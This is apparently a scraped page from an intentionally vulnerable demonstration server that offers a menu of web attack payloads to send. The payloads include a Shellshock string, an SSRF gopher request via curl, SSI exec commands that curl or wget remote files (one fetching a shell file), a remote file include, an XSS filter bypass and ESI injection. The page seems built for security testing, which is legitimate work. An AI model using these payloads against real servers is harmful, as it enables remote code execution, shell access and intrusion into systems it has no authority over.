Test Server - Web Server Vulnerability
PoC
HOME
ATTACKS
API
LOGIN
PoC
HOME
ATTACKS
API
LOGIN
Let's Launch Some Web Server Vulnerability Attacks
Select Attack Payload and Run it!
Web Server Vulnerability Attacks
str ExitWindowsEx
AVAK$(RETURN_CODE)OS
() {:;}; echo Content-type:text/plain; echo;/bin/cat test.html
curl -s -i -X POST -d 'url=gopher://127.0.0.1:53/_%2500%
!--#echo var='script_filename' -->
!--#echo var='path_info_translated' -->
!--#exec cmd='curl http://sn1persecurity.com/.testing/rfi_vuln.php' -->
!--#exec cmd='wget http://website.com/dir/shell.txt' -->
!--#include virtual='http://sn1persecurity.com/.testing/rfi_vuln.php' -->
>alert(/Chrome%20XSS%20filter%20bypass/);>">x=esi:assign name='var1 ' value=''cript''/>sesi:vars name='$(var1)'
pre>!--#echo var='DATE_LOCAL' -->
Send Attack
WARNING:
This is an intentionally weak demonstration website used only for testing.
©
Monitorapp
All Right Reserved